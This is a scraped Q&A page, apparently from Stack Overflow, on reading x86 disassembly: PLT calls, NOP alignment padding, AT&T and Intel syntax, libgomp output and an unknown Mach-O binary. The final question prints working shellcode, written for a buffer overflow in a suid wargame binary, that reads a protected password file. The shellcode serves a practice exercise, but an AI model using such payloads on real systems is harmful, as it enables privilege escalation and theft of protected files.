What's the purpose of signal pt in this example - gcc

What does callq 400b90 <signal#plt> do?
How would it look line in C?
4013a2: 48 83 ec 08 sub $0x8,%rsp
4013a6: be a0 12 40 00 mov $0x4012a0,%esi
4013ab: bf 02 00 00 00 mov $0x2,%edi
4013b0: e8 db f7 ff ff callq 400b90 <signal#plt>
4013b5: 48 83 c4 08 add $0x8,%rsp
4013b9: c3 retq

What does callq 400b90 <signal#plt> do?
Call the signal function via the PLT (procedure linkage table). So more technical: It pushes the current instruction pointer onto the stack and jumps to signal#plt.
How would it look line in C?
void* foo(void) {
return signal(2, (void *) 0x4012a0);
}
Let's look at your code line-by-line:
sub $0x8,%rsp
This reserves some stack space. You can ignore this (the stack space is unused).
mov $0x4012a0,%esi
mov $0x2,%edi
Put the value 0x4012a0 and 0x2 in the registers ESI and EDI. By the ABI, this is how arguments are passed to a function.
callq 400b90 <signal#plt>
Call the function signal through the PLT. The PLT has something to do with the dynamic linker since we cannot be sure where the signal function will end up in memory whenthis is built. Basically, this just finds the final memory location and calls signal.
add $0x8,%rsp
retq
Undo the sub from earlier and return to the caller.

Related

Why do I find some never called instructions nopl, nopw after ret or jmp in GCC compiled code? [duplicate]

I've been working with C for a short while and very recently started to get into ASM. When I compile a program:
int main(void)
{
int a = 0;
a += 1;
return 0;
}
The objdump disassembly has the code, but nops after the ret:
...
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: 83 ec 10 sub $0x10,%esp
804839a: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
80483a1: 83 45 fc 01 addl $0x1,-0x4(%ebp)
80483a5: b8 00 00 00 00 mov $0x0,%eax
80483aa: c9 leave
80483ab: c3 ret
80483ac: 90 nop
80483ad: 90 nop
80483ae: 90 nop
80483af: 90 nop
...
From what I learned nops do nothing, and since after ret wouldn't even be executed.
My question is: why bother? Couldn't ELF(linux-x86) work with a .text section(+main) of any size?
I'd appreciate any help, just trying to learn.
First of all, gcc doesn't always do this. The padding is controlled by -falign-functions, which is automatically turned on by -O2 and -O3:
-falign-functions
-falign-functions=n
Align the start of functions to the next power-of-two greater than n, skipping up to n bytes. For instance,
-falign-functions=32 aligns functions to the next 32-byte boundary, but -falign-functions=24 would align to the next 32-byte boundary only
if this can be done by skipping 23 bytes or less.
-fno-align-functions and -falign-functions=1 are equivalent and mean that functions will not be aligned.
Some assemblers only support this flag when n is a power of two; in
that case, it is rounded up.
If n is not specified or is zero, use a machine-dependent default.
Enabled at levels -O2, -O3.
There could be multiple reasons for doing this, but the main one on x86 is probably this:
Most processors fetch instructions in aligned 16-byte or 32-byte blocks. It can be
advantageous to align critical loop entries and subroutine entries by 16 in order to minimize
the number of 16-byte boundaries in the code. Alternatively, make sure that there is no 16-byte boundary in the first few instructions after a critical loop entry or subroutine entry.
(Quoted from "Optimizing subroutines in assembly
language" by Agner Fog.)
edit: Here is an example that demonstrates the padding:
// align.c
int f(void) { return 0; }
int g(void) { return 0; }
When compiled using gcc 4.4.5 with default settings, I get:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
000000000000000b <g>:
b: 55 push %rbp
c: 48 89 e5 mov %rsp,%rbp
f: b8 00 00 00 00 mov $0x0,%eax
14: c9 leaveq
15: c3 retq
Specifying -falign-functions gives:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
b: eb 03 jmp 10 <g>
d: 90 nop
e: 90 nop
f: 90 nop
0000000000000010 <g>:
10: 55 push %rbp
11: 48 89 e5 mov %rsp,%rbp
14: b8 00 00 00 00 mov $0x0,%eax
19: c9 leaveq
1a: c3 retq
This is done to align the next function by 8, 16 or 32-byte boundary.
From “Optimizing subroutines in assembly language” by A.Fog:
11.5 Alignment of code
Most microprocessors fetch code in aligned 16-byte or 32-byte blocks. If an importantsubroutine entry or jump label happens to be near the end of a 16-byte block then themicroprocessor will only get a few useful bytes of code when fetching that block of code. Itmay have to fetch the next 16 bytes too before it can decode the first instructions after thelabel. This can be avoided by aligning important subroutine entries and loop entries by 16.
[...]
Aligning a subroutine entry is as simple as putting as many
NOP
's as needed before thesubroutine entry to make the address divisible by 8, 16, 32 or 64, as desired.
As far as I remember, instructions are pipelined in cpu and different cpu blocks (loader, decoder and such) process subsequent instructions. When RET instructions is being executed, few next instructions are already loaded into cpu pipeline. It's a guess, but you can start digging here and if you find out (maybe the specific number of NOPs that are safe, share your findings please.

Why does the assembly encoding of objdump vary?

I was reading this article about Position Independent Code and I encountered this assembly listing of a function.
0000043c <ml_func>:
43c: 55 push ebp
43d: 89 e5 mov ebp,esp
43f: e8 16 00 00 00 call 45a <__i686.get_pc_thunk.cx>
444: 81 c1 b0 1b 00 00 add ecx,0x1bb0
44a: 8b 81 f0 ff ff ff mov eax,DWORD PTR [ecx-0x10]
450: 8b 00 mov eax,DWORD PTR [eax]
452: 03 45 08 add eax,DWORD PTR [ebp+0x8]
455: 03 45 0c add eax,DWORD PTR [ebp+0xc]
458: 5d pop ebp
459: c3 ret
0000045a <__i686.get_pc_thunk.cx>:
45a: 8b 0c 24 mov ecx,DWORD PTR [esp]
45d: c3 ret
However, on my machine (gcc-7.3.0, Ubuntu 18.04 x86_64), I got slightly different result below:
0000044d <ml_func>:
44d: 55 push %ebp
44e: 89 e5 mov %esp,%ebp
450: e8 29 00 00 00 call 47e <__x86.get_pc_thunk.ax>
455: 05 ab 1b 00 00 add $0x1bab,%eax
45a: 8b 90 f0 ff ff ff mov -0x10(%eax),%edx
460: 8b 0a mov (%edx),%ecx
462: 8b 55 08 mov 0x8(%ebp),%edx
465: 01 d1 add %edx,%ecx
467: 8b 90 f0 ff ff ff mov -0x10(%eax),%edx
46d: 89 0a mov %ecx,(%edx)
46f: 8b 80 f0 ff ff ff mov -0x10(%eax),%eax
475: 8b 10 mov (%eax),%edx
477: 8b 45 0c mov 0xc(%ebp),%eax
47a: 01 d0 add %edx,%eax
47c: 5d pop %ebp
47d: c3 ret
The main difference I found was that the semantic of mov instruction. In the upper listing, mov ebp,esp actually moves esp to ebp, while in the lower listing, mov %esp,%ebp does the same thing, but the order of operands are different.
This is quite confusing, even when I have to code hand-written assembly. To summarize, my questions are (1) why I got different assembly representations for the same instructions and (2) which one I should use, when writing assembly code (e.g. with __asm(:::);)
obdjump defaults to -Matt AT&T syntax (like your 2nd code block). See att vs. intel-syntax. The tag wikis have some info about the syntax differences: https://stackoverflow.com/tags/att/info vs. https://stackoverflow.com/tags/intel-syntax/info
Either syntax has the same limitations, imposed by what the machine itself can do, and what's encodeable in machine code. They're just different ways of expressing that in text.
Use objdump -d -Mintel for Intel syntax. I use alias disas='objdump -drwC -Mintel' in my .bashrc, so I can disas foo.o and get the format I want, with relocations printed (important for making sense of a non-linked .o), without line-wrapping for long instructions, and with C++ symbol names demangled.
In inline asm, you can use either syntax, as long as it matches what the compiler is expecting. The default is AT&T, and that's what I'd recommend using for compatibility with clang. Maybe there's a way, but clang doesn't work the same way as GCC with -masm=intel.
Also, AT&T is basically standard for GNU C inline asm on x86, and it means you don't need special build options for your code to work.
But you can use gcc -masm=intel to compile source files that use Intel syntax in their asm statements. This is fine for your own use if you don't care about clang.
If you're writing code for a header, you can make it portable between AT&T and Intel syntax using dialect alternatives, at least for GCC:
static inline
void atomic_inc(volatile int *p) {
// use __asm__ instead of asm in headers, so it works even with -std=c11 instead of gnu11
__asm__("lock {addl $1, %0 | add %0, 1}": "+m"(*p));
// TODO: flag output for return value?
// maybe doesn't need to be asm volatile; compilers know that modifying pointed-to memory is a visible side-effect unless it's a local that fully optimizes away.
// If you want this to work as a memory barrier, use a `"memory"` clobber to stop compile-time memory reordering. The lock prefix provides a runtime full barrier
}
source+asm outputs for gcc/clang on the Godbolt compiler explorer.
With g++ -O3 (default or -masm=att), we get
atomic_inc(int volatile*):
lock addl $1, (%rdi) # operand-size is from my explicit addl suffix
ret
With g++ -O3 -masm=intel, we get
atomic_inc(int volatile*):
lock add DWORD PTR [rdi], 1 # operand-size came from the %0 expansion
ret
clang works with the AT&T version, but fails with -masm=intel (or the -mllvm --x86-asm-syntax=intel which that implies), because that apparently only applies to code emitted by LLVM, not for how the front-end fills in the asm template.
The clang error message is:
<source>:4:13: error: unknown use of instruction mnemonic without a size suffix
__asm__("lock {addl $1, %0 | add %0, 1}": "+m"(*p));
^
<inline asm>:1:2: note: instantiated into assembly here
lock add (%rdi), 1
^
1 error generated.
It picked the "Intel" syntax alternative, but still filled in the template with an AT&T memory operand.

Objdump disassemble doesn't match source code

I'm investigating the execution flow of a OpenMP program linked to libgomp. It uses the #pragma omp parallel for. I already know that this construct becomes, among other things, a call to GOMP_parallel function, which is implemented as follows:
void
GOMP_parallel (void (*fn) (void *), void *data,
unsigned num_threads, unsigned int flags)
{
num_threads = gomp_resolve_num_threads (num_threads, 0);
gomp_team_start (fn, data, num_threads, flags, gomp_new_team (num_threads));
fn (data);
ialias_call (GOMP_parallel_end) ();
}
When executing objdump -d on libgomp, GOMP_parallel appears as:
000000000000bc80 <GOMP_parallel##GOMP_4.0>:
bc80: 41 55 push %r13
bc82: 41 54 push %r12
bc84: 41 89 cd mov %ecx,%r13d
bc87: 55 push %rbp
bc88: 53 push %rbx
bc89: 48 89 f5 mov %rsi,%rbp
bc8c: 48 89 fb mov %rdi,%rbx
bc8f: 31 f6 xor %esi,%esi
bc91: 89 d7 mov %edx,%edi
bc93: 48 83 ec 08 sub $0x8,%rsp
bc97: e8 d4 fd ff ff callq ba70 <GOMP_ordered_end##GOMP_1.0+0x70>
bc9c: 41 89 c4 mov %eax,%r12d
bc9f: 89 c7 mov %eax,%edi
bca1: e8 ca 37 00 00 callq f470 <omp_in_final##OMP_3.1+0x2c0>
bca6: 44 89 e9 mov %r13d,%ecx
bca9: 44 89 e2 mov %r12d,%edx
bcac: 48 89 ee mov %rbp,%rsi
bcaf: 48 89 df mov %rbx,%rdi
bcb2: 49 89 c0 mov %rax,%r8
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final##OMP_3.1+0x420>
bcba: 48 89 ef mov %rbp,%rdi
bcbd: ff d3 callq *%rbx
bcbf: 48 83 c4 08 add $0x8,%rsp
bcc3: 5b pop %rbx
bcc4: 5d pop %rbp
bcc5: 41 5c pop %r12
bcc7: 41 5d pop %r13
bcc9: e9 32 ff ff ff jmpq bc00 <GOMP_parallel_end##GOMP_1.0>
bcce: 66 90 xchg %ax,%ax
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example. Second, that function consists of:
void
GOMP_ordered_end (void)
{
}
According the the objdump output, this function starts at ba00 and finishes at bbbd. How could it have so much code in a function that is empty? By the way, there is comment in the source code of libgomp saying that it should appear only when using the ORDERED construct (as the name suggests), which is not the case of my test.
Finally, the main concern here for me is: why does the source code differ so much from the disassembly? Why, for example, isn't there any mention to gomp_team_start in the assembly?
The system has gcc version 5.4.0
According the the objdump output, this function starts at ba00 and finishes at bbbd.
How could it have so much code in a function that is empty?
The function itself is small but GCC just used some additional bytes to align the next function and store some static data (probly used by other functions in this file). Here's what I see in local ordered.o:
00000000000003b0 <GOMP_ordered_end>:
3b0: f3 c3 repz retq
3b2: 66 66 66 66 66 2e 0f data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
3b9: 1f 84 00 00 00 00 00
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example.
Don't get distracted by GOMP_ordered_end##GOMP_1.0+0x70 mark in assembly code. All it says is that this calls some local library function (for which objdump didn't find any symbol info) which happens to be located 112 bytes after GOMP_ordered_end. This is most likely gomp_resolve_num_threads.
Why, for example, isn't there any mention to gomp_team_start in the assembly?
Hm, this looks pretty much like it:
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final##OMP_3.1+0x420>

Reversed Mach-O 64-bit x86 Assembly analysis

This question is for Intel x86 assembly experts to answer. Thanks for your effort in advance!
Problem Specification
I am analysing a binary file, which match Mach-O 64-bit x86 assembly. I am currently using MacOS 64 OS. The assembly comes from objdump.
The problem is that when I am learning assembly, I can see variable name "$xxx", I can see string value in ascii and I can also see the callee name like "call _printf"
But in this assembly, I can get nothing above:
no main function:
Disassembly of section __TEXT,__text:
__text:
100000c90: 55 pushq %rbp
100000c91: 48 89 e5 movq %rsp, %rbp
100000c94: 48 83 ec 10 subq $16, %rsp
100000c98: 48 8d 3d bf 02 00 00 leaq 703(%rip), %rdi
100000c9f: b0 00 movb $0, %al
100000ca1: e8 68 02 00 00 callq 616
100000ca6: 89 45 fc movl %eax, -4(%rbp)
100000ca9: 48 83 c4 10 addq $16, %rsp
100000cad: 5d popq %rbp
100000cae: c3 retq
100000caf: 90 nop
100000cb0: 55 pushq %rbp
...
The above is codes frame will be executed, but I have no idea where it is executed.
Also, I newbie of AT&T assemble. Hence, could you tell me what is the meaning of instruction:
0000000100000c90 pushq %rbp
0000000100000c98 leaq 0x2bf(%rip), %rdi ## literal pool for: "xxxx\n"
...
0000000100000cd0 callq 0x100000c90
Is it a loop? I am not sure but it seems to be. And why we they use %rip and %rdi register. In intel x86 I know that EIP represents current caller address, but I don't understand the meaning here.
call integer:
No matter what call convention they used, I had never seen code pattern like "call 616":
"100000cd0: e8 bb ff ff ff callq -69 <__mh_execute_header+C90>"
After ret:
Ret in intel x86, means delete stack frame and return control flow to caller. It should be an independent function. However, after this, we can see codes like
100000cae: c3 retq
100000caf: 90 nop
/* new function call */
100000cb0: 55 pushq %rbp
...
It is ridiculous!
ASCII string lost:
I have already viewed the binary in Hexadecimal format, and recognise some ascii string before reverse it to asm file.
However, in this file no ascii string occurrences!
Total architecture review:
Disassembly of section __TEXT,__text:
__text:
from address 10000c90 to 100000ef6 of 145 lines
Disassembly of section __TEXT,__stubs:
__stubs:
from address 100000efc to 100000f14 of 5 lines asm codes:
100000efc: ff 25 16 01 00 00 jmp qword ptr [rip + 278]
100000f02: ff 25 18 01 00 00 jmp qword ptr [rip + 280]
100000f08: ff 25 1a 01 00 00 jmp qword ptr [rip + 282]
100000f0e: ff 25 1c 01 00 00 jmp qword ptr [rip + 284]
100000f14: ff 25 1e 01 00 00 jmp qword ptr [rip + 286]
Disassembly of section __TEXT,__stub_helper:
__stub_helper:
...
Disassembly of section __TEXT,__cstring:
__cstring:
...
Disassembly of section __TEXT,__unwind_info:
__unwind_info:
...
Disassembly of section __DATA,__nl_symbol_ptr:
__nl_symbol_ptr:
...
Disassembly of section __DATA,__got:
__got:
...
Disassembly of section __DATA,__la_symbol_ptr:
__la_symbol_ptr:
...
Disassembly of section __DATA,__data:
__data:
...
Since it might be a virus, I cannot execute it. How should I analyse it ?
Update on May 21
I have already identified where is the output, and if I totally understand the data flow pipeline represented in this programme, I might be able to figure out the possible solutions.
I am appreciated if someone can give me the detailed explanation. Thank you !
Update on May 22
I installed a MacOS in VirtualBox and after chmod privileges , I executed the programme but nothing special except for two lines of output happened. And the result hiding in the binary file.
You don't need a main if you are not using C. The binary header contains the entry point address.
Nothing special about call 616, it's just that you don't have (all) symbols. It's somewhat strange that objdump didn't calculate the address for you, but it should be 0x100000ca6+616.
Not sure what you find ridiculous there. One function ends, another starts.
That's not a question. Yes, you can create strings at runtime so you won't have them in the image. Possibly they are encrypted.

PTRACE_TRACEME without parent

I'm trying for fun to exploit a code which uses ptrace to prevent debugging. This executable is suid, therefore there's no use in cracking it.
It have also the stack segment executable. This executable is made for playing. After I found my self a vulnerability in it, I tried buffer overflow it. I wrote a shellcode which launches a shell, and with my surprise it hangs. (BASH reports the process have been stopped) After some tests, I ended up to the conclusion that ptrace do not only prevents debugging, but it also prevents my shellcode to get executed.
Reading about ptrace, I found that a process which invokes ptrace(PTRACE_TRACEME,0,1,0) will be stoped as soon as it invokes the syscall exec. So I changed strategy, since ptrace will stop the process as soon as it launches an executable, I tried a shellcode which reads a file. My objective is not launch a shell, but instead read a file which my user have no permission. At last, this code also hanged.
Can anyone explain me why my code, in spite it contains no exec call, it gets hanged?
Is there any way to stop the ptrace from within the process itself?
In my case, ptraced process have no parent, and it is running with higher privileges, cause the suid, how can it be controlled?
Here my code which should not contains any exec.
Here my shell code:
0: 31 c0 xor eax,eax
2: 31 db xor ebx,ebx
4: 31 c9 xor ecx,ecx
6: 31 d2 xor edx,edx
8: eb 38 jmp 0x42
a: 5b pop ebx
b: c6 43 13 01 mov BYTE PTR [ebx+0x13],0x1
f: fe 4b 13 dec BYTE PTR [ebx+0x13]
12: b0 05 mov al,0x5
14: 31 c9 xor ecx,ecx
16: cd 80 int 0x80
18: 89 c6 mov esi,eax
1a: eb 06 jmp 0x22
1c: b0 01 mov al,0x1
1e: 31 db xor ebx,ebx
20: cd 80 int 0x80
22: 89 f3 mov ebx,esi
24: b0 03 mov al,0x3
26: 83 ec 01 sub esp,0x1
29: 89 e1 mov ecx,esp
2b: b2 01 mov dl,0x1
2d: cd 80 int 0x80
2f: 31 db xor ebx,ebx
31: 39 c3 cmp ebx,eax
33: 74 e7 je 0x1c
35: b0 04 mov al,0x4
37: b3 01 mov bl,0x1
39: b2 01 mov dl,0x1
3b: cd 80 int 0x80
3d: 83 c4 01 add esp,0x1
40: eb e0 jmp 0x22
42: e8 c3 ff ff ff call 0xa
47: db '/home/level8/passwd'
I believe you have a core misunderstanding of how ptrace works.
When the process stops after calling execve, that is a good thing. It means your debugger gets a chance to change things around, both before and after the execve.
It seems to me like you wrote ptrace(PTRACE_TRACEME) in the child, but you have not implemented any of the parent side support you should have. As a result, as soon as ptrace is trying to notify the debugger of an event, your process stops and never restarts.

Resources